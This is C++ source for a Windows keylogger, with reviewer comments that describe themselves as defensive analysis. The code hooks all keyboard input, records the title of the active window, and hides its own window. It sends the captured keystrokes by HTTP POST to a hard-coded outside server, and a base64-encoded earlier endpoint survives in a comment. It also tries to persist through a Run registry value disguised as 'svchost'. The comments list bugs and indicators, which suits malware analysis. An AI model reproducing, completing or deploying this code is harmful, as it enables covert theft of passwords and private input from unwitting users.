/** (c) 2012 Michał (Foxbond) Chraniuk */
#define _WIN32_WINNT 0x0500
#include <windows.h>
#include <iostream>
//#include <fstream>
#include <ctime>
#include <stdio.h>
#include <string>
#include <cstdio>
#include <unistd.h>
#include "curl/curl.h"
#include "base64/base64.h"
#include "base64/base64.cpp"
using namespace std;
/* Global state shared by the hook callback, WinMain and the helpers below.
   NOTE(review): this file is a keystroke logger — it captures key-up events
   through a WH_KEYBOARD_LL hook, buffers them in LogFile, POSTs the buffer to a
   hard-coded HTTP endpoint (save_log) and tries to register itself under the
   Run key as "svchost" (test_key/create_key). The comments in this file are
   defensive analysis notes; the code's defects are deliberately left unfixed. */
HHOOK hKeyboardHook = 0;
/* In-memory keystroke buffer; flushed by save_log once it exceeds save_buffer_size. */
string LogFile;
/* Last foreground window seen by the hook; a change triggers a title/time record. */
HWND hCurrentWindow;
char sWindowTitle[256];
/* CRLF used as a record separator.
   NOTE(review): no NUL terminator — every `LogFile += cReturn` below goes
   through the const char* overload and reads past the end of this array (UB). */
char cReturn[] = {13, 10};
SYSTEMTIME SystemTime;
/* Formatted "[ Czas: hh:mm:ss, " prefix written by sprintf in the hook. */
char cTime[64];
/* Not referenced anywhere in the visible code. */
char cFileName[64];
/* Upload failures since the last successful save; save_log dumps to disk at 2. */
unsigned short int error_count=0;
#define BUFSIZE 128
//#define cURL_SAVE_BUFFER 2048
/* Upload threshold in bytes for LogFile (checked at the end of each key-up). */
unsigned int save_buffer_size = 2048;
int test_key(void);
void create_key(void);
LRESULT CALLBACK WindowProcedure (HWND, UINT, WPARAM, LPARAM);
/* Make the class name into a global variable */
char szClassName[ ] = "WindowsApp";
void save_log (void);
/* Low-level keyboard hook procedure (WH_KEYBOARD_LL), installed from WinMain.
   For every WM_KEYUP it appends a textual rendering of the released key to the
   global LogFile, first emitting a timestamp + window-title header whenever the
   foreground window changed since the previous key. When LogFile grows past
   save_buffer_size it is handed to save_log() for upload.
   Parameters are the standard hook-proc triple; lParam points at a
   KBDLLHOOKSTRUCT. Always chains to CallNextHookEx.
   NOTE(review): this is the capture half of a keystroke logger; the notes
   below document its behaviour for analysts and do not improve it. */
LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
KBDLLHOOKSTRUCT *pKbdLLHookStruct = (KBDLLHOOKSTRUCT *)lParam;
// Only act on nCode >= 0; negative codes still fall through to CallNextHookEx.
if (nCode >= 0)
{
// Only plain key-up is matched, so WM_SYSKEYUP (keys released with Alt held) is not logged.
if (wParam == WM_KEYUP)
{
// Foreground window changed: write a "[ Czas: hh:mm:ss,  Nazwa okna: <title> ]" record.
if(hCurrentWindow != GetForegroundWindow())
{
hCurrentWindow = GetForegroundWindow();
GetWindowText(hCurrentWindow, sWindowTitle, 256);
GetSystemTime(&SystemTime);
// was sprintf_s
sprintf(cTime, "[ Czas: %02d:%02d:%02d, ", SystemTime.wHour, SystemTime.wMinute, SystemTime.wSecond);
// NOTE(review): cReturn ({13, 10}) carries no NUL terminator, so this
// const char* append reads beyond the array (undefined behaviour).
LogFile += cReturn;
LogFile += cTime;
LogFile += " Nazwa okna: ";
LogFile += sWindowTitle;
LogFile += " ]";
LogFile += cReturn;
}
// Map the raw virtual-key code to text. Only the two Shift keys are consulted
// (GetAsyncKeyState results OR'ed together), so Caps Lock, AltGr and non-US
// layouts are not reflected; "[Capslock]" is logged as a token but never toggles case.
switch(pKbdLLHookStruct->vkCode)
{
case VK_RETURN:
LogFile += "[Enter]";
LogFile += cReturn;
break;
case VK_BACK:
LogFile += "[Backspace]";
break;
case VK_ESCAPE:
LogFile += "[Escape]";
break;
case VK_CAPITAL:
LogFile += "[Capslock]";
break;
case VK_LMENU:
LogFile += "[LAlt]";
break;
case VK_RMENU:
LogFile += "[RAlt]";
break;
case VK_MENU:
LogFile += "[Alt]";
break;
case VK_CONTROL:
LogFile += "[Ctrl]";
break;
case VK_DELETE:
LogFile += "[Delete]";
break;
case VK_SPACE:
LogFile += " ";
break;
case VK_MULTIPLY:
LogFile += "*";
break;
case VK_ADD:
LogFile += "+";
break;
case VK_SUBTRACT:
LogFile += "-";
break;
case VK_DECIMAL:
LogFile += ".";
break;
case VK_DIVIDE:
LogFile += "/";
break;
// OEM punctuation keys, addressed by numeric VK code (188 = VK_OEM_COMMA, etc.).
case 188:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "<";
else
LogFile += ",";
break;
case 192:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
// Shifted backtick is rendered as a doubled "~~" — looks like a typo in the original.
LogFile += "~~";
else
LogFile += "`";
break;
case 222:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "\"";
else
LogFile += "'";
break;
case 220:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "|";
else
LogFile += "\\";
break;
case 219:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "{";
else
LogFile += "[";
break;
case 221:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "}";
else
LogFile += "]";
break;
case 186:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += ":";
else
LogFile += ";";
break;
case 191:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "?";
else
LogFile += "/";
break;
case 190:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += ">";
else
LogFile += ".";
break;
// NOTE(review): 44 duplicates the comma mapping of case 188 above; 44 is the
// ASCII code of ',' rather than an OEM comma VK code, so this case appears to be a mix-up.
case 44:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "<";
else
LogFile += ",";
break;
case 187:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "+";
else
LogFile += "=";
break;
case 189:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "_";
else
LogFile += "-";
break;
// Letters A..Z (VK codes 65..90): upper case when either Shift is active, else lower.
case 65:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "A";
else
LogFile += "a";
break;
case 66:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "B";
else
LogFile += "b";
break;
case 67:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "C";
else
LogFile += "c";
break;
case 68:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "D";
else
LogFile += "d";
break;
case 69:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "E";
else
LogFile += "e";
break;
case 70:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "F";
else
LogFile += "f";
break;
case 71:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "G";
else
LogFile += "g";
break;
case 72:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "H";
else
LogFile += "h";
break;
case 73:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "I";
else
LogFile += "i";
break;
case 74:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "J";
else
LogFile += "j";
break;
case 75:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "K";
else
LogFile += "k";
break;
case 76:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "L";
else
LogFile += "l";
break;
case 77:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "M";
else
LogFile += "m";
break;
case 78:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "N";
else
LogFile += "n";
break;
case 79:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "O";
else
LogFile += "o";
break;
case 80:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "P";
else
LogFile += "p";
break;
case 81:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "Q";
else
LogFile += "q";
break;
case 82:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "R";
else
LogFile += "r";
break;
case 83:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "S";
else
LogFile += "s";
break;
case 84:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "T";
else
LogFile += "t";
break;
case 85:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "U";
else
LogFile += "u";
break;
case 86:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "V";
else
LogFile += "v";
break;
case 87:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "W";
else
LogFile += "w";
break;
case 88:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "X";
else
LogFile += "x";
break;
case 89:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "Y";
else
LogFile += "y";
break;
case 90:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "Z";
else
LogFile += "z";
break;
// Numeric keypad digits are logged as-is, without any Shift/NumLock handling.
case VK_NUMPAD0:
LogFile += "0";
break;
case VK_NUMPAD1:
LogFile += "1";
break;
case VK_NUMPAD2:
LogFile += "2";
break;
case VK_NUMPAD3:
LogFile += "3";
break;
case VK_NUMPAD4:
LogFile += "4";
break;
case VK_NUMPAD5:
LogFile += "5";
break;
case VK_NUMPAD6:
LogFile += "6";
break;
case VK_NUMPAD7:
LogFile += "7";
break;
case VK_NUMPAD8:
LogFile += "8";
break;
case VK_NUMPAD9:
LogFile += "9";
break;
// Top-row digits (VK codes 48..57) with their US-layout shifted symbols.
case 48:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += ")";
else
LogFile += "0";
break;
case 49:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "!";
else
LogFile += "1";
break;
case 50:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "@";
else
LogFile += "2";
break;
case 51:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "#";
else
LogFile += "3";
break;
case 52:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "$";
else
LogFile += "4";
break;
case 53:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "%";
else
LogFile += "5";
break;
case 54:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "^";
else
LogFile += "6";
break;
case 55:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "&";
else
LogFile += "7";
break;
case 56:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "*";
else
LogFile += "8";
break;
case 57:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "(";
else
LogFile += "9";
break;
}//end switch (probably)
// Flush to the remote endpoint once the buffer passes the threshold.
// Note this runs synchronously inside the low-level hook callback.
if ( LogFile.size() > save_buffer_size )
{
save_log(); //cURL save
}
}
}
return CallNextHookEx(hKeyboardHook, nCode, wParam, lParam);
}
/* Program entry point. Registers a window class ("WindowsApp"), creates a 1x1
   window titled "SYSTEM" that is immediately hidden, installs the global
   low-level keyboard hook, optionally adds the Run-key persistence value, then
   pumps messages until WM_QUIT and unhooks on exit.
   NOTE(review): the hidden "SYSTEM"/"WindowsApp" window and the Run value
   "svchost" (see test_key/create_key) are the host-side indicators of this
   sample; the MessageBox strings are Polish and are left untouched. */
int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpszArgument, int nFunsterStil) {
HWND hwnd; /* This is the handle for our window */
MSG messages; /* Here messages to the application are saved */
WNDCLASSEX wincl; /* Data structure for the windowclass */
/* The Window structure */
wincl.hInstance = hThisInstance;
wincl.lpszClassName = szClassName;
wincl.lpfnWndProc = WindowProcedure; /* This function is called by windows */
wincl.style = CS_DBLCLKS; /* Catch double-clicks */
wincl.cbSize = sizeof (WNDCLASSEX);
/* Use default icon and mouse-pointer */
wincl.hIcon = LoadIcon (NULL, IDI_APPLICATION);
wincl.hIconSm = LoadIcon (NULL, IDI_APPLICATION);
wincl.hCursor = LoadCursor (NULL, IDC_ARROW);
wincl.lpszMenuName = NULL; /* No menu */
wincl.cbClsExtra = 0; /* No extra bytes after the window class */
wincl.cbWndExtra = 0; /* structure or the window instance */
/* Use Windows's default color as the background of the window */
wincl.hbrBackground = (HBRUSH) COLOR_BACKGROUND;
/* Register the window class, and if it fails quit the program */
if (!RegisterClassEx (&wincl)) {
MessageBox(0, "Nie udało się zarejestrować klasy! Program kończy działanie...", 0, 0);
return 0;
}
/* The class is registered, let's create the program*/
hwnd = CreateWindowEx (
0, /* Extended possibilites for variation */
szClassName, /* Classname */
"SYSTEM", /* Title Text */
WS_OVERLAPPEDWINDOW, /* default window */
CW_USEDEFAULT, /* Windows decides the position */
CW_USEDEFAULT, /* where the window ends up on the screen */
1, /* The programs width */
1, /* and height in pixels */
HWND_DESKTOP, /* The window is a child-window to desktop */
NULL, /* No menu */
hThisInstance, /* Program Instance handler */
NULL /* No Window Creation data */
);
/* The window is created only to own a message loop; it is never shown. */
ShowWindow (hwnd, SW_HIDE);
/* Global (thread id 0) low-level keyboard hook; the callback is LowLevelKeyboardProc above. */
hKeyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, (HOOKPROC)LowLevelKeyboardProc, GetModuleHandle(0), 0);
if(hKeyboardHook == NULL)
MessageBox(0, "Funkcja SetWindowsHookEx nie powiodła się.", 0, 0);
/* Whether to create the Run-key value (1 = yes). test_key() == 2 means "value absent".
   NOTE(review): with regtype hard-coded to 9 in test_key, its return value is
   computed from uninitialised locals, so whether create_key runs is not well defined. */
unsigned short int create_reg_key = 1;
if ( test_key() == 2 && create_reg_key == 1 ) { create_key(); }
/* Run the message loop. It will run until GetMessage() returns 0 */
while (GetMessage (&messages, NULL, 0, 0))
{
/* Translate virtual-key messages into character messages */
TranslateMessage(&messages);
/* Send message to WindowProcedure */
DispatchMessage(&messages);
}
/* Remove the hook on shutdown; any unsent LogFile content is simply dropped here. */
if(UnhookWindowsHookEx(hKeyboardHook) == 0)
MessageBox(0, "Funkcja UnhookWindowsHookEx nie powiodła się.", 0, 0);
return EXIT_SUCCESS;
}
/* This function is called by the Windows function DispatchMessage() */
/* Window procedure for the hidden "WindowsApp" window. It only handles
   WM_DESTROY (posting WM_QUIT so the loop in WinMain ends); every other
   message is delegated to DefWindowProc. */
LRESULT CALLBACK WindowProcedure (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam)
{
switch (message) /* handle the messages */
{
case WM_DESTROY:
PostQuitMessage (0); /* send a WM_QUIT to the message queue */
break;
default: /* for messages that we don't deal with */
return DefWindowProc (hwnd, message, wParam, lParam);
}
return 0;
}
// Write any errors in here
// libcurl error text (CURLOPT_ERRORBUFFER); appended to LogFile on upload failure.
static char errorBuffer[CURL_ERROR_SIZE];
// Response body collected by writer() via CURLOPT_WRITEDATA; never read afterwards
// in the visible code, and never cleared between uploads.
static string buffer;
// This is the writer call back function used by curl
// libcurl CURLOPT_WRITEFUNCTION callback. Appends the received chunk
// (size * nmemb bytes starting at data) to the std::string passed through
// CURLOPT_WRITEDATA and returns the number of bytes consumed.
// Returns 0 without touching anything when no destination string was supplied.
static int writer(char *data, size_t size, size_t nmemb,
std::string *buffer)
{
if (buffer == NULL)
return 0;
const size_t chunk_len = size * nmemb;
buffer->append(data, chunk_len);
return chunk_len;
}
/* Uploads the accumulated LogFile buffer to the hard-coded HTTP endpoint via
   an HTTP POST, then appends the buffer to a local "buffer.txt" and clears it.
   On failure the libcurl error text is appended to LogFile and error_count is
   bumped; at the second failure the buffer is written to "buffer.txt" anyway
   and cleared. Called from the hook once LogFile exceeds save_buffer_size.
   NOTE(review): this is the exfiltration half of the logger. Indicators:
   plaintext HTTP POST to the URL below with fields version/id/log, and a
   plaintext keystroke copy in buffer.txt in the process's working directory.
   The defects noted inline are intentionally left as they are. */
void save_log (void)
{
// cURL upload
CURL *curl;
CURLcode result;
//default: http://foxbond.cba.pl/bots/keylogger/revelation_log_handler.php
// The commented-out reader.Get carried the earlier endpoint base64-encoded (decoded form on the line above).
//string url=reader.Get("cpp", "url", "aHR0cDovL2ZveGJvbmQuY2JhLnBsL2JvdHMva2V5bG9nZ2VyL3JldmVsYXRpb25fbG9nX2hhbmRsZXIucGhw");
// Exfiltration endpoint (plain HTTP, no TLS).
string url = "http://danarroth.com/klr/logHandler.php";
// NOTE(review): method_post is never allocated; sprintf below writes through an
// uninitialised pointer, and the "%d" conversions are fed const char* arguments
// (format/argument mismatch). Both are undefined behaviour as written.
char* method_post;
//char *format = ;
string version = "0.1"; //reader.Get("cpp", "version", "0");
string id = "0"; //reader.Get("cpp", "id", "0");
sprintf(method_post, "version=%d&id=%d&log=%d", version.c_str(), id.c_str(), LogFile.c_str() );
curl = curl_easy_init();
if (curl)
{
// Now set up all of the curl options
curl_easy_setopt(curl, CURLOPT_ERRORBUFFER, errorBuffer);
curl_easy_setopt(curl, CURLOPT_URL, url.c_str() );
//curl_easy_setopt(curl, CURLOPT_HEADER, 0);
//curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1);
curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, writer);
curl_easy_setopt(curl, CURLOPT_WRITEDATA, &buffer);
curl_easy_setopt(curl, CURLOPT_POST, 1);
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, method_post);
// Attempt to retrieve the remote page
result = curl_easy_perform(curl);
// Always cleanup
curl_easy_cleanup(curl);
// Did we succeed?
if (result == CURLE_OK) {
//ok
// Name of the local log-buffer file (relative to the current working directory).
string log_filename = "buffer.txt";
FILE *file;
// NOTE(review): fopen's result is not checked before fputs/fclose.
file=fopen(log_filename.c_str(),"a"); // append
fputs(LogFile.c_str(),file);
fclose(file);
LogFile.clear(); // clear the log
}
else {
//error
// The failure text stays in LogFile and is re-sent with the next attempt.
error_count++;
LogFile += "\n Save Error!!! \n";
LogFile += errorBuffer;
LogFile += "\n end error log \n";
}
}
else {
//curl object error
error_count++;
LogFile += "\n cURL init error!!! \n";
}
// Second consecutive failure: dump to disk instead and start over.
if (error_count >= 2) {
// Name of the local log-buffer file (same as above).
string log_filename = "buffer.txt";
FILE *file;
// NOTE(review): fopen's result is not checked before fputs/fclose.
file=fopen(log_filename.c_str(),"a"); // append
fputs(LogFile.c_str(),file);
fclose(file);
LogFile.clear(); // clear the log
error_count = 0;
LogFile += "\n Second error. Log saved to file, buffer cleared! \n";
}
}
/* Checks whether the persistence value already exists under
   SOFTWARE\Microsoft\Windows\CurrentVersion\Run (HKCU when regtype == 0,
   HKLM for any other value except 9).
   Returns 1 if the key could not be opened, 2 if the "svchost" value is
   missing (or reported larger than BUFSIZE), 0 if it is present.
   NOTE(review): regtype is hard-coded to 9, so neither RegOpenKeyEx branch
   runs; reg_key, hKey and check are then read before being assigned and the
   return value is not well defined. The Run value named "svchost" is the
   indicator to look for on hosts where a build with a different regtype ran. */
int test_key(void)
{
int check;
HKEY hKey;
char path[BUFSIZE];
DWORD buf_length=BUFSIZE;
int reg_key;
unsigned short int regtype = 9;
if (regtype == 0)
{
reg_key=RegOpenKeyEx(HKEY_CURRENT_USER,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
}
else if (regtype != 9)
{
reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
}
// Key could not be opened (nonzero = error code).
if(reg_key!=0)
{
check=1;
return check;
}
// Look up the "svchost" value; path receives its data but is otherwise unused.
reg_key=RegQueryValueEx(hKey,"svchost",NULL,NULL,(LPBYTE)path,&buf_length);
if((reg_key!=0)||(buf_length>BUFSIZE))
check=2;
if(reg_key==0)
check=0;
RegCloseKey(hKey);
return check;
}
/* Writes the persistence value: Run\svchost = "%windir%\svchost.exe" under
   HKCU (regtype == 0) or HKLM (any other value except 9).
   NOTE(review): regtype is hard-coded to 9 here too, so no RegCreateKey
   branch runs and reg_key/hkey are read uninitialised. Other points visible
   in the code: the value is stored as REG_SZ rather than REG_EXPAND_SZ, so
   whether "%windir%" is expanded depends on the consumer; cbData is
   strlen(path) without the terminating NUL; the key handle is never closed;
   and the const is cast away from c_str(). Left unfixed on purpose. */
void create_key(void)
{
int reg_key;
HKEY hkey;
// Path the Run value points at; masquerades as the system svchost binary.
string key_path = "%windir%\\svchost.exe";//reader.Get("cpp", "path", "%windir%\\svchost.exe");
char *path = (char*)key_path.c_str();
unsigned short int regtype = 9; // same selector as in test_key
if (regtype == 0)
{
reg_key=RegCreateKey(HKEY_CURRENT_USER,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
}
else if (regtype != 9)
{
reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
}
if(reg_key==0)
{
RegSetValueEx((HKEY)hkey,"svchost",0,REG_SZ,(BYTE *)path,strlen(path));
}
}